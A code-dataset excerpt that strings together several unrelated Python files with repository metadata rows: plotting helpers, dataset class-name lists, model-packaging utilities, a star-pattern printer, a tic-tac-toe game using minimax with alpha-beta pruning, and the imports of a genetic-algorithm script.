color_map=None,
color_key: dict = None,
mask_values: list = None,
mask_name: str = "NA",
mask_color: str = "k",
ax_label_size: float = 12,
frame_offset: float = 0.05,
spine_width: float = 0.5,
spine_color: str = "k",
displayed_sides: tuple = ("bottom", "left"),
legend_ondata: bool = True,
legend_onside: bool = True,
legend_size: float = 12,
legends_per_col: int = 20,
cbar_shrink: float = 0.6,
marker_scale: float = 70,
lspacing: float = 0.1,
cspacing: float = 1,
savename: str = None,
dpi: int = 300,
force_ints_as_cats: bool = True,
n_columns: int = 4,
w_pad: float = None,
h_pad: float = None,
show_fig: bool = True,
):
"""
Shows shaded scatter plots. If more then one dataframe is provided it will place the scatterplots in a grid.
"""
import datashader as dsh
from datashader.mpl_ext import dsshow
import datashader.transfer_functions as tf
from functools import partial
axs = _create_axes(dfs, in_ax, figsize, figsize, w_pad, h_pad, n_columns)
for n, df in _iter_dataframes(dfs, mask_values, mask_name, force_ints_as_cats):
dim1, dim2, vc = df.columns[:3]
v = df[vc]
col_map, col_key = _scatter_make_colors(
v, color_map, color_key, mask_color, mask_name
)
if v.dtype.name == "category":
agg = dsh.count_cat(vc)
else:
if v.nunique() == 1:
agg = dsh.count(vc)
else:
agg = dsh.mean(vc)
ax = axs[int(n / n_columns), n % n_columns]
artist = dsshow(
df,
dsh.Point(dim1, dim2),
aggregator=agg,
norm="eq_hist",
color_key=col_key,
cmap=col_map,
alpha_range=(min_alpha, 255),
shade_hook=partial(
tf.dynspread, threshold=spread_threshold, max_px=spread_px
),
plot_height=pixels,
plot_width=pixels,
aspect="equal",
width_scale=1,
height_scale=1,
ax=ax,
)
_scatter_label_axis(df, ax, ax_label_size, frame_offset)
_scatter_cleanup(ax, spine_width, spine_color, displayed_sides)
_scatter_legends(
df,
ax,
col_map,
col_key,
legend_ondata,
legend_onside,
legend_size,
legends_per_col,
marker_scale,
lspacing,
cspacing,
cbar_shrink,
)
if savename:
plt.savefig(savename, dpi=dpi, bbox_inches="tight")
if show_fig:
plt.show()
else:
return axs
def _draw_pie(ax, dist, colors, xpos, ypos, size):
# https://stackoverflow.com/questions/56337732/how-to-plot-scatter-pie-chart-using-matplotlib
cumsum = np.cumsum(dist)
cumsum = cumsum / cumsum[-1]
pie = [0] + cumsum.tolist()
for r1, r2, c in zip(pie[:-1], pie[1:], colors):
angles = np.linspace(2 * np.pi * r1, 2 * np.pi * r2)
x = [0] + np.cos(angles).tolist()
y = [0] + np.sin(angles).tolist()
xy = np.column_stack([x, y])
ax.scatter([xpos], [ypos], marker=xy, s=size, c=c)
def hierarchy_pos(
g, root=None, width=1.0, vert_gap=0.2, vert_loc=0, leaf_vs_root_factor=0.5
):
"""
This function was lifted from here:
https://github.com/springer-math/Mathematics-of-Epidemics-on-Networks/blob/80c8accbe0c6b7710c0a189df17529696ac31bf9/EoN/auxiliary.py
If the graph is a tree this will return the positions to plot this in a
hierarchical layout.
Based on Joel's answer at https://stackoverflow.com/a/29597209/2966723,
but with some modifications.
We include this because it may be useful for plotting transmission trees,
and there is currently no networkx equivalent (though it may be coming soon).
There are two basic approaches we think of to allocate the horizontal
location of a node.
- Top down: we allocate horizontal space to a node. Then its ``k``
descendants split up that horizontal space equally. This tends to result
in overlapping nodes when some have many descendants.
- Bottom up: we allocate horizontal space to each leaf node. A node at a
higher level gets the entire space allocated to its descendant leaves.
Based on this, leaf nodes at higher levels get the same space as leaf
nodes very deep in the tree.
We use use both of these approaches simultaneously with ``leaf_vs_root_factor``
determining how much of the horizontal space is based on the bottom up
or top down approaches. ``0`` gives pure bottom up, while 1 gives pure top
down.
Args:
g: the graph (must be a tree)
root: the root node of the tree
- if the tree is directed and this is not given, the root will be found and used
- if the tree is directed and this is given, then the positions will be just for the descendants of
this node.
- if the tree is undirected and not given, then a random choice will be used.
width: horizontal space allocated for this branch - avoids overlap with other branches
vert_gap: gap between levels of hierarchy
vert_loc: vertical location of root
leaf_vs_root_factor: leaf_vs_root_factor
xcenter: horizontal location of root
"""
import networkx as nx
if not nx.is_tree(g):
raise TypeError("cannot use hierarchy_pos on a graph that is not a tree")
if root is None:
if isinstance(g, nx.DiGraph):
root = next(
iter(nx.topological_sort(g))
) # allows back compatibility with nx version 1.11
else:
root = np.random.choice(list(g.nodes))
def _hierarchy_pos(
g,
root,
leftmost,
width,
leafdx=0.2,
vert_gap=0.2,
vert_loc=0,
xcenter=0.5,
rootpos=None,
leafpos=None,
parent=None,
):
"""
see hierarchy_pos docstring for most arguments
pos: a dict saying where all nodes go if they have been assigned
parent: parent of this branch. - only affects it if non-directed
"""
if rootpos is None:
rootpos = {root: (xcenter, vert_loc)}
else:
rootpos[root] = (xcenter, vert_loc)
if leafpos is None:
leafpos = {}
children = list(g.neighbors(root))
leaf_count = 0
if not isinstance(g, nx.DiGraph) and parent is not None:
children.remove(parent)
if len(children) != 0:
rootdx = width / len(children)
nextx = xcenter - width / 2 - rootdx / 2
for child in children:
nextx += rootdx
rootpos, leafpos, newleaves = _hierarchy_pos(
g,
child,
leftmost + leaf_count * leafdx,
width=rootdx,
leafdx=leafdx,
vert_gap=vert_gap,
vert_loc=vert_loc - vert_gap,
xcenter=nextx,
rootpos=rootpos,
leafpos=leafpos,
parent=root,
)
leaf_count += newleaves
leftmostchild = min((x for x, y in [leafpos[child] for child in children]))
rightmostchild = max((x for x, y in [leafpos[child] for child in children]))
leafpos[root] = ((leftmostchild + rightmostchild) / 2, vert_loc)
else:
leaf_count = 1
leafpos[root] = (leftmost, vert_loc)
# pos[root] = (leftmost + (leaf_count-1)*dx/2., vert_loc)
# print(leaf_count)
return rootpos, leafpos, leaf_count
xcenter = width / 2.0
if isinstance(g, nx.DiGraph):
leafcount = len(
[node for node in nx.descendants(g, root) if g.out_degree(node) == 0]
)
elif isinstance(g, nx.Graph):
leafcount = len(
[
node
for node in nx.node_connected_component(g, root)
if g.degree(node) == 1 and node != root
]
)
rootpos, leafpos, leaf_count = _hierarchy_pos(
g,
root,
0,
width,
leafdx=width * 1.0 / leafcount,
vert_gap=vert_gap,
vert_loc=vert_loc,
xcenter=xcenter,
)
pos = {}
for node in rootpos:
pos[node] = (
leaf_vs_root_factor * leafpos[node][0]
+ (1 - leaf_vs_root_factor) * rootpos[node][0],
leafpos[node][1],
)
xmax = max(x for x, y in pos.values())
for node in pos:
pos[node] = (pos[node][0] * width / xmax, pos[node][1])
return pos
def plot_cluster_hierarchy(
sg,
clusts,
color_values=None,
force_ints_as_cats: bool = True,
width: float = 2,
lvr_factor: float = 0.5,
vert_gap: float = 0.2,
min_node_size: float = 10,
node_size_multiplier: float = 1e4,
node_power: float = 1,
root_size: float = 100,
non_leaf_size: float = 10,
show_labels: bool = False,
fontsize=10,
root_color: str = "#C0C0C0",
non_leaf_color: str = "k",
cmap: str = None,
color_key: bool = None,
edgecolors: str = "k",
edgewidth: float = 1,
alpha: float = 0.7,
figsize=(5, 5),
ax=None,
show_fig: bool = True,
savename: str = None,
save_dpi=300,
):
"""
Shows a plot showing cluster hierarchy.
Returns:
If requested (with parameter `show_fig`) a matplotlib Axes object containing the plot
(which is the modified `ax` parameter if given).
"""
import networkx as nx
import math
from matplotlib.colors import to_hex
if color_values is None:
color_values = pd.Series(clusts)
using_clust_for_colors = True
else:
color_values = pd.Series(color_values)
using_clust_for_colors = False
color_values = _scatter_fix_type(color_values, force_ints_as_cats)
cmap, color_key = _scatter_make_colors(
color_values, cmap, color_key, "k", "longdummyvaluesofh3489hfpiqehdcbla"
)
pos = hierarchy_pos(
sg, width=width * math.pi, leaf_vs_root_factor=lvr_factor, vert_gap=vert_gap
)
new_pos = {
u: (r * math.cos(theta), r * math.sin(theta)) for u, (theta, r) in pos.items()
}
if color_key is None:
cluster_values = (
pd.DataFrame({"clusters": clusts, "v": color_values})
.groupby("clusters")
.mean()["v"]
)
mmv: pd.Series = (cluster_values - cluster_values.min()) / (
cluster_values.max() - cluster_values.min()
)
color_key = {k: to_hex(cmap(v)) for k, v in mmv.to_dict().items()}
else:
cluster_values = None
cs = pd.Series(clusts).value_counts()
cs = (node_size_multiplier * ((cs / cs.sum()) ** node_power)).to_dict()
nc, ns = [], []
for i in sg.nodes():
if "partition_id" in sg.nodes[i]:
clust_id = sg.nodes[i]["partition_id"]
if cluster_values is not None or using_clust_for_colors:
nc.append(color_key[clust_id])
ns.append(max(cs[clust_id], min_node_size))
else:
nc.append("white")
ns.append(0)
else:
if sg.nodes[i]["nleaves"] == len(clusts):
nc.append(root_color)
ns.append(root_size)
else:
nc.append(non_leaf_color)
ns.append(non_leaf_size)
if ax is None:
fig, ax = plt.subplots(1, 1, figsize=figsize)
nx.draw(
sg,
pos=new_pos,
node_size=ns,
node_color=nc,
ax=ax,
edgecolors=edgecolors,
alpha=alpha,
linewidths=edgewidth,
)
if cluster_values is None and using_clust_for_colors is False:
for i in sg.nodes():
if "partition_id" in sg.nodes[i]:
clust_id = sg.nodes[i]["partition_id"]
idx = clusts == clust_id
counts = color_values[idx].value_counts()
_draw_pie(
ax,
counts.values,
[color_key[x] for x in counts.index],
new_pos[i][0],
new_pos[i][1],
max(cs[clust_id], min_node_size),
)
if show_labels:
for i in sg.nodes():
if "partition_id" in sg.nodes[i]:
clust_id = sg.nodes[i]["partition_id"]
ax.text(
new_pos[i][0],
new_pos[i][1],
clust_id,
fontsize=fontsize,
ha="center",
va="center",
)
if savename:
plt.savefig(savename, dpi=save_dpi)
if show_fig:
plt.show()
else:
return ax
| 28.916737
| 136
| 0.531092
|
7703e48fc7b865d657387900c3b02c2d98f773c3
| 4,319
|
py
|
Python
|
paz/datasets/utils.py
|
DeepanChakravarthiPadmanabhan/paz_coco
|
ebbf178491f1771e873425a9b1507b0374325c48
|
[
"MIT"
] | 300
|
2020-10-29T08:02:05.000Z
|
2022-03-30T21:47:32.000Z
|
paz/datasets/utils.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 30
|
2020-10-29T12:40:32.000Z
|
2022-03-31T14:06:35.000Z
|
paz/datasets/utils.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 62
|
2020-10-29T12:34:13.000Z
|
2022-03-29T05:21:45.000Z
|
def get_class_names(dataset_name='VOC2007'):
"""Gets label names for the classes of the supported datasets.
# Arguments
dataset_name: String. Dataset name. Valid dataset names are:
VOC2007, VOC2012, COCO and YCBVideo.
# Returns
List of strings containing the class names for the dataset given.
# Raises
ValueError: in case of invalid dataset name
"""
if dataset_name in ['VOC2007', 'VOC2012', 'VOC']:
class_names = ['background', 'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person',
'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']
elif dataset_name == 'COCO':
class_names = ['background', 'person', 'bicycle', 'car', 'motorcycle',
'airplane', 'bus', 'train', 'truck', 'boat',
'traffic light', 'fire hydrant', 'stop sign',
'parking meter', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella',
'handbag', 'tie', 'suitcase', 'frisbee', 'skis',
'snowboard', 'sports ball', 'kite', 'baseball bat',
'baseball glove', 'skateboard', 'surfboard',
'tennis racket', 'bottle', 'wine glass',
'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana',
'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet',
'tv', 'laptop', 'mouse', 'remote', 'keyboard',
'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase',
'scissors', 'teddy bear', 'hair drier', 'toothbrush']
elif dataset_name == 'YCBVideo':
class_names = ['background', '037_scissors', '008_pudding_box',
'024_bowl', '005_tomato_soup_can', '007_tuna_fish_can',
'010_potted_meat_can', '061_foam_brick', '011_banana',
'035_power_drill', '004_sugar_box', '019_pitcher_base',
'006_mustard_bottle', '036_wood_block',
'009_gelatin_box', '051_large_clamp',
'040_large_marker', '003_cracker_box',
'025_mug', '052_extra_large_clamp',
'021_bleach_cleanser', '002_master_chef_can']
elif dataset_name == 'FAT':
class_names = ['background', '037_scissors', '008_pudding_box',
'024_bowl', '005_tomato_soup_can', '007_tuna_fish_can',
'010_potted_meat_can', '061_foam_brick', '011_banana',
'035_power_drill', '004_sugar_box', '019_pitcher_base',
'006_mustard_bottle', '036_wood_block',
'009_gelatin_box', '051_large_clamp',
'040_large_marker', '003_cracker_box',
'025_mug', '052_extra_large_clamp',
'021_bleach_cleanser', '002_master_chef_can']
elif dataset_name == 'FERPlus':
return ['neutral', 'happiness', 'surprise', 'sadness',
'anger', 'disgust', 'fear', 'contempt']
elif dataset_name == 'FER':
return ['angry', 'disgust', 'fear', 'happy',
'sad', 'surprise', 'neutral']
elif dataset_name == 'IMDB':
return ['man', 'woman']
elif dataset_name == 'CityScapes':
return ['void', 'flat', 'construction',
'object', 'nature', 'sky', 'human', 'vehicle']
else:
raise ValueError('Invalid dataset', dataset_name)
return class_names
def get_arg_to_class(class_names):
"""Constructs dictionary from argument to class names.
# Arguments
class_names: List of strings containing the class names.
# Returns
Dictionary mapping integer to class name.
"""
return dict(zip(list(range(len(class_names))), class_names))
| 44.989583
| 78
| 0.526279
|
92c19efd530f04175195738b85f74b77b33c249b
| 6,367
|
py
|
Python
|
python/arachne/utils/model_utils.py
|
fixstars/arachne
|
03c00fc5105991d0d706b935d77e6f9255bae9e7
|
[
"MIT"
] | 3
|
2022-03-29T03:02:20.000Z
|
2022-03-29T03:48:38.000Z
|
python/arachne/utils/model_utils.py
|
fixstars/arachne
|
03c00fc5105991d0d706b935d77e6f9255bae9e7
|
[
"MIT"
] | null | null | null |
python/arachne/utils/model_utils.py
|
fixstars/arachne
|
03c00fc5105991d0d706b935d77e6f9255bae9e7
|
[
"MIT"
] | 1
|
2022-03-29T05:44:12.000Z
|
2022-03-29T05:44:12.000Z
|
import dataclasses
import os
import tarfile
import tempfile
from dataclasses import asdict
from typing import Optional
import onnx
import onnxruntime
import tensorflow as tf
import torch
import tvm
import yaml
from omegaconf import DictConfig, OmegaConf
from ..data import Model, ModelFormat, ModelSpec, TensorSpec
from .onnx_utils import get_onnx_model_spec
from .tf_utils import get_keras_model_spec, get_saved_model_spec, get_tflite_model_spec
from .version_utils import (
get_cuda_version,
get_cudnn_version,
get_tensorrt_version,
get_torch2trt_version,
)
def init_from_file(model_file: str) -> Model:
"""The function to initialize arachne.data.Model from a model file
Args:
model_file (str): path to a model file
Returns:
Model: a model instance
"""
format: ModelFormat
spec: Optional[ModelSpec]
if model_file.endswith(".tflite"):
format = ModelFormat.TFLITE
spec = get_tflite_model_spec(model_file)
elif model_file.endswith(".h5"):
format = ModelFormat.KERAS_H5
spec = get_keras_model_spec(model_file)
elif model_file.endswith(".onnx"):
format = ModelFormat.ONNX
spec = get_onnx_model_spec(model_file)
elif model_file.endswith(".pb"):
format = ModelFormat.TF_PB
spec = None
elif model_file.endswith(".pth") or model_file.endswith(".pt"):
format = ModelFormat.PYTORCH
spec = None
else:
raise RuntimeError("Fail to detect a model format for " + model_file)
return Model(path=model_file, format=format, spec=spec)
def __is_saved_model_dir(model_dir: str):
found_pb = False
found_assets = False
found_variables = False
for f in os.listdir(model_dir):
if f.endswith(".pb"):
found_pb = True
if f == "assets":
found_assets = True
if f == "variables":
found_variables = True
return found_pb & found_assets & found_variables
def __is_openvino_model_dir(model_dir: str):
found_bin = False
found_xml = False
found_mapping = False
for f in os.listdir(model_dir):
if f.endswith(".bin"):
found_bin = True
if f.endswith(".xml"):
found_xml = True
if f.endswith(".mapping"):
found_mapping = True
return found_bin & found_xml & found_mapping
def __is_caffe_model_dir(model_dir: str):
found_caffemodel = False
found_prototxt = False
for f in os.listdir(model_dir):
if f.endswith(".caffemodel"):
found_caffemodel = True
if f.endswith(".prototxt"):
found_prototxt = True
return found_caffemodel & found_prototxt
def init_from_dir(model_dir: str) -> Model:
"""The function to initialize arachne.data.Model from a model directory
Args:
model_dir (str): path to a model directory
Returns:
Model: a model instance
"""
format: ModelFormat
spec: Optional[ModelSpec]
if __is_saved_model_dir(model_dir):
format = ModelFormat.TF_SAVED_MODEL
spec = get_saved_model_spec(model_dir)
elif __is_openvino_model_dir(model_dir):
format = ModelFormat.OPENVINO
spec = None
elif __is_caffe_model_dir(model_dir):
format = ModelFormat.CAFFE
spec = None
else:
raise RuntimeError("Fail to detect a model format for " + model_dir)
return Model(path=model_dir, format=format, spec=spec)
def load_model_spec(spec_file_path: str) -> ModelSpec:
"""The function to load the model specification from a YAML file
Args:
spec_file_path (str): path to a YAML file that describes the model specification
Returns:
ModelSpec: the tensor information of the model or None
"""
tmp = OmegaConf.load(spec_file_path)
tmp = OmegaConf.to_container(tmp)
assert isinstance(tmp, dict)
inputs = []
outputs = []
for inp in tmp["inputs"]:
inputs.append(TensorSpec(name=inp["name"], shape=inp["shape"], dtype=inp["dtype"]))
for out in tmp["outputs"]:
outputs.append(TensorSpec(name=out["name"], shape=out["shape"], dtype=out["dtype"]))
return ModelSpec(inputs=inputs, outputs=outputs)
def save_model(model: Model, output_path: str, tvm_cfg: Optional[DictConfig] = None):
"""The function to save the model that is a tool output as a TAR file
Args:
model (Model): a tool output model
output_path (str): an output path
tvm_cfg (:obj:`DictConfig`, optional): pass to the TVM config if the model depends on the TVM
"""
if dataclasses.is_dataclass(model.spec):
spec = asdict(model.spec)
else:
assert False, f"model.spec should be arachne.data.ModelSpec: {model.spec}"
env = {"model_spec": spec, "dependencies": []}
pip_deps = []
if model.path.endswith(".tar"):
pip_deps.append({"tvm": tvm.__version__})
assert tvm_cfg is not None, "when save a tvm_package.tar, tvm_cfg must be avaiable"
env["tvm_device"] = "cpu"
targets = list(tvm_cfg.composite_target)
if "tensorrt" in targets:
env["dependencies"].append({"tensorrt": get_tensorrt_version()})
if "cuda" in targets:
env["dependencies"].append({"cuda": get_cuda_version()})
env["dependencies"].append({"cudnn": get_cudnn_version()})
env["tvm_device"] = "cuda"
if model.path.endswith(".tflite"):
pip_deps.append({"tensorflow": tf.__version__})
if model.path.endswith("saved_model"):
pip_deps.append({"tensorflow": tf.__version__})
if model.path.endswith(".onnx"):
pip_deps.append({"onnx": onnx.__version__})
pip_deps.append({"onnxruntime": onnxruntime.__version__})
if model.path.endswith(".pth"):
pip_deps.append({"torch": torch.__version__}) # type: ignore
if model.path.endswith("_trt.pth"):
pip_deps.append({"torch2trt": get_torch2trt_version()})
env["dependencies"].append({"pip": pip_deps})
with tarfile.open(output_path, "w:gz") as tar:
tar.add(model.path, arcname=model.path.split("/")[-1])
with tempfile.TemporaryDirectory() as tmp_dir:
with open(tmp_dir + "/env.yaml", "w") as file:
yaml.dump(env, file)
tar.add(tmp_dir + "/env.yaml", arcname="env.yaml")
| 32.319797
| 101
| 0.658395
|
d51f72dc15fd932780a0e0f8d65cab5ccbe23cca
| 437
|
py
|
Python
|
Wave Patterns/wavepattern25.py
|
Daksh777/Python-PatternHouse
|
ab801631c2e1f5ed3cc12a26c959d41a5e51273d
|
[
"MIT"
] | 61
|
2021-01-07T03:56:25.000Z
|
2022-02-26T14:39:52.000Z
|
PythonPatternPrograms/WavePatterns/Pattern 25.py
|
Ankur-586/Printing-Pattern-Programs
|
33e534ed66a02705e6cd6bc1992d4818a44d1b6b
|
[
"MIT"
] | 851
|
2021-04-02T09:08:15.000Z
|
2022-01-12T11:26:57.000Z
|
PythonPatternPrograms/WavePatterns/Pattern 25.py
|
Ankur-586/Printing-Pattern-Programs
|
33e534ed66a02705e6cd6bc1992d4818a44d1b6b
|
[
"MIT"
] | 15
|
2021-04-13T06:10:17.000Z
|
2022-01-08T05:07:21.000Z
|
wH = 5 # 1
wL = 4 # 2
for x in range(1, wH + 1):
for y in range(1, wL + 1):
for z in range(1, wH + 1):
if (x == z or x + z == wH + 1):
print("*", end=" ")
else:
print(" ", end=" ") # 3
print()
"""
1) wH - change value to increase/decrease the height of the wave
2) wL - change value to increase/decrease the length of the wave
3) single whitespaces
"""
| 25.705882
| 64
| 0.475973
|
ebc15451fe0ebff5240009cca23e7a2897268689
| 150
|
py
|
Python
|
main.py
|
tahv0/etherneumpaymentbot
|
1485f6b069f698f5d29045414a4ebd4b2a924935
|
[
"BSD-2-Clause"
] | 2
|
2018-01-17T06:35:52.000Z
|
2019-12-16T16:02:08.000Z
|
main.py
|
tahv0/etherneumpaymentbot
|
1485f6b069f698f5d29045414a4ebd4b2a924935
|
[
"BSD-2-Clause"
] | null | null | null |
main.py
|
tahv0/etherneumpaymentbot
|
1485f6b069f698f5d29045414a4ebd4b2a924935
|
[
"BSD-2-Clause"
] | 3
|
2019-01-04T17:55:17.000Z
|
2021-07-16T22:58:42.000Z
|
#!/usr/bin/env python
from paymentpoller.blockchainpoller import start_polling
def run():
start_polling()
if __name__ == "__main__":
run()
| 15
| 56
| 0.713333
|
1074ddde0d610d4bc20845eaf5372f7802217d67
| 9,565
|
py
|
Python
|
chapter6_tictactoe.py
|
liangxuCHEN/Algorithms_python
|
c76e2396bd60f477b69ed55a9a7e7c86eff46ed4
|
[
"AFL-3.0"
] | 5
|
2020-12-11T08:14:08.000Z
|
2021-09-07T13:40:20.000Z
|
chapter6_tictactoe.py
|
liangxuCHEN/Algorithms_python
|
c76e2396bd60f477b69ed55a9a7e7c86eff46ed4
|
[
"AFL-3.0"
] | null | null | null |
chapter6_tictactoe.py
|
liangxuCHEN/Algorithms_python
|
c76e2396bd60f477b69ed55a9a7e7c86eff46ed4
|
[
"AFL-3.0"
] | 4
|
2021-07-13T02:14:57.000Z
|
2022-02-23T09:21:25.000Z
|
import time
class Game(object):
"""井字游戏"""
def __init__(self):
# 实例化类便开始初始化游戏
self.initialize_game()
# 初始化棋盘
def initialize_game(self):
self.current_state = [['.','.','.'],
['.','.','.'],
['.','.','.']]
# 玩家X用X作为标记,作为先手
self.player_turn = 'X'
# 打印棋盘在屏幕上
def draw_board(self):
for i in range(0, 3):
for j in range(0, 3):
# 如果棋盘没有放置,显示位置坐标
if self.current_state[i][j] == ".":
val = "({},{})".format(i, j)
else:
val = self.current_state[i][j]
if j != 2:
print('%-5s|' % val, end=" ") # -5s是指定占位空间
else: # 最后一个元素输出就换行
print('{}'.format(val))
print()
# 判断棋子位置是否合理
def is_valid(self, px, py):
if px < 0 or px > 2 or py < 0 or py > 2:
return False # 坐标不在棋盘上,不通过
elif self.current_state[px][py] != '.':
return False # 坐标已经有标记了,不通过
else: # 其他情况是合理的
return True
# 每一步之后都检查游戏是否结束,给出胜利者
def is_end(self):
for i in range(0, 3):
# 水平是否连线
if (self.current_state[i] == ['X', 'X', 'X']):
return 'X'
elif (self.current_state[i] == ['O', 'O', 'O']):
return 'O'
# 垂直是否连线
if self.current_state[0][i] != '.':
if self.current_state[0][i] == self.current_state[1][i] == self.current_state[2][i]:
return self.current_state[0][i] # 返回赢家(该位置上的符号)
# 斜线是否连线
if self.current_state[0][0] != '.':
if self.current_state[0][0] == self.current_state[1][1] == self.current_state[2][2]:
return self.current_state[0][0]
# 斜线是否连线
if self.current_state[0][2] != '.':
if self.current_state[0][2] == self.current_state[1][1] == self.current_state[2][0]:
return self.current_state[0][2]
# 棋盘是否已经放满
for i in range(0, 3):
if self.current_state[i].count(".") > 0: # 若还有".",说明还有位置
return None # 还有位置,返回空,游戏继续
return '.' # 平局返回"."
# 符号 'O' 玩家是计算机,求极大值
def max(self):
# 有可能的价值为-1(失败),0(平局),1(胜利)
max_val = -2 # max_val是初始化alpha值,-2已经小于所有值
px = None # 坐标初始化
py = None
result = self.is_end() # 返回当前结果
# 如果已经结束,就是递归返回
# 这里是构建完整树图,所以不设置递归深度
# 一直递归至游戏结束,根据结果返回评估值
if result == 'X':
return (-1, 0, 0)
elif result == 'O':
return (1, 0, 0)
elif result == '.':
return (0, 0, 0)
for i in range(0, 3):
for j in range(0, 3):
if self.current_state[i][j] == '.':
# 遍历每一个位置,如果是可以放棋子,就尝试在这里放棋子
self.current_state[i][j] = 'O'
# 然后作为一个分支,在下一层求极小值中寻找极大值
(m, min_i, min_j) = self.min()
if m > max_val: # 若有极大值,则更新下棋坐标
max_val = m
px = i
py = j
self.current_state[i][j] = '.' # 尝试结束后要清空这位置
return (max_val, px, py)
# 符号 'X' 玩家是人,是计算机对手,所以是求极小值
def min(self):
# 有可能的价值为-1(胜利),0(平局),1(失败),刚好与计算机相反
min_val = 2 # min_val初始化,2已经大于所有值
qx = None # 坐标初始化
qy = None
result = self.is_end() # 返回当前结果
if result == 'X':
return (-1, 0, 0)
elif result == 'O':
return (1, 0, 0)
elif result == '.':
return (0, 0, 0)
for i in range(0, 3):
for j in range(0, 3):
if self.current_state[i][j] == '.':
# 遍历每一个位置,如果是可以放棋子,就尝试在这里放棋子
self.current_state[i][j] = 'X'
# 然后作为一个分支,在下一层求极大值中寻找极小值
(m, max_i, max_j) = self.max()
if m < min_val: # 若有极小值,则更新下棋坐标
min_val = m
qx = i
qy = j
self.current_state[i][j] = '.'
return (min_val, qx, qy)
# 开始游戏,程序入口
def play(self):
# 极大值极小值算法
while True: # 轮流下棋,直到游戏结束
self.draw_board() # 先把当前棋盘打印在屏幕上
self.result = self.is_end() # 判断是否结束游戏
if self.result != None: # 游戏结束
if self.result == 'X': # 如果是X是胜利者
print('胜者为X!')
elif self.result == 'O': # 反之亦然
print('胜者为O!')
elif self.result == '.': # 平局
print("平局")
self.initialize_game() # 初始化棋盘,结束游戏
return
# 若没有结束游戏,看到谁下棋
if self.player_turn == 'X': # 到X下棋
while True:
start = time.time() # 记录X的思考时间
# 这里可以忽略,不给人类提示也可以的
(m, qx, qy) = self.min() # X是代表人,也就是程序对手,所以找极小值
end = time.time() # 思考结束,得到下棋的坐标qx,qy
print('用时: {}s'.format(round(end - start, 7)))
print('推荐步骤: X = {}, Y = {}'.format(qx, qy))
try:
px = int(input('输入坐标值x: '))
py = int(input('输入坐标值y: '))
except:
# 若输入不能转化为整数,请再次输入
print('输入不符合要求,请再次输入。')
break
if self.is_valid(px, py):
self.current_state[px][py] = 'X'
self.player_turn = 'O'
break
else:
print('输入不符合要求,请再次输入。')
else:
(m, px, py) = self.max() # 到计算机下棋,所以要找极大值
self.current_state[px][py] = 'O'
self.player_turn = 'X'
def max_alpha_beta(self, alpha, beta):
max_val = -2
px = None
py = None
result = self.is_end()
if result == 'X':
return (-1, 0, 0)
elif result == 'O':
return (1, 0, 0)
elif result == '.':
return (0, 0, 0)
for i in range(0, 3):
for j in range(0, 3):
if self.current_state[i][j] == '.':
self.current_state[i][j] = 'O'
(m, min_i, in_j) = self.min_alpha_beta(alpha, beta)
if m > max_val:
max_val = m
px = i
py = j
self.current_state[i][j] = '.'
# 前面的思路是一样的,主要添加以下剪枝条件的判断
alpha = max(max_val, alpha)
if beta <= alpha:
return (max_val, px, py)
return (max_val, px, py)
def min_alpha_beta(self, alpha, beta):
min_val = 2
qx = None
qy = None
result = self.is_end()
if result == 'X':
return (-1, 0, 0)
elif result == 'O':
return (1, 0, 0)
elif result == '.':
return (0, 0, 0)
for i in range(0, 3):
for j in range(0, 3):
if self.current_state[i][j] == '.':
self.current_state[i][j] = 'X'
(m, max_i, max_j) = self.max_alpha_beta(alpha, beta)
if m < min_val:
min_val = m
qx = i
qy = j
self.current_state[i][j] = '.'
# 前面的思路是一样的,主要添加以下剪枝条件的判断
beta = min(min_val, beta)
if beta <= alpha:
return (min_val, qx, qy)
return (min_val, qx, qy)
def play_alpha_beta(self):
# 极大极小值算法+剪枝算法
while True:
self.draw_board() # 先把当前棋盘打印在屏幕上
self.result = self.is_end() # 判断是否结束游戏
if self.result != None: # 游戏结束
if self.result == 'X': # 如果是X是胜利者
print('胜者为X!')
elif self.result == 'O': # 反之亦然
print('胜者为O!')
elif self.result == '.': # 平局
print("平局")
self.initialize_game() # 初始化棋盘,结束游戏
return
if self.player_turn == 'X':
while True:
start = time.time()
# X是代表人,也就是程序对手,所以找极小值,alpha,beta初始化值为-2,2
(m, qx, qy) = self.min_alpha_beta(-2, 2)
end = time.time()
print('用时: {}s'.format(round(end - start, 7)))
print('推荐步骤: X = {}, Y = {}'.format(qx, qy))
try:
px = int(input('输入坐标值x: '))
py = int(input('输入坐标值y: '))
except:
# 若输入不能转化为整数,请再次输入
print('输入不符合要求,请再次输入。')
break
if self.is_valid(px, py):
self.current_state[px][py] = 'X'
self.player_turn = 'O'
break
else:
print('输入不符合要求,请再次输入。')
else:
# 到计算机下棋,所以要找极大值,alpha,beta初始化值为-2,2
(m, px, py) = self.max_alpha_beta(-2, 2)
self.current_state[px][py] = 'O'
self.player_turn = 'X'
if __name__ == "__main__":
g = Game()
g.play_alpha_beta()
| 36.09434
| 101
| 0.404391
|
a9bb5d28443e1d82c0b3ff6a7ae144e87db5b58e
| 8,302
|
py
|
Python
|
GA.py
|
danielo620/Steel
|
049719988c1d69df25aaf2c7201421d9f556dafe
|
[
"Apache-2.0"
] | null | null | null |
GA.py
|
danielo620/Steel
|
049719988c1d69df25aaf2c7201421d9f556dafe
|
[
"Apache-2.0"
] | null | null | null |
GA.py
|
danielo620/Steel
|
049719988c1d69df25aaf2c7201421d9f556dafe
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import Section
from joblib import Parallel, delayed
import SolutionStiffnessSpeed
import CostCalculator
import Mutation3
import UniformCrossover
import Roullette
import os
from timeit import default_timer as timer
import xlsxwriter
import pandas as pd
path = 'C:/Users/rocky/Desktop/Code/NPZ' # path of location of data.npz folder
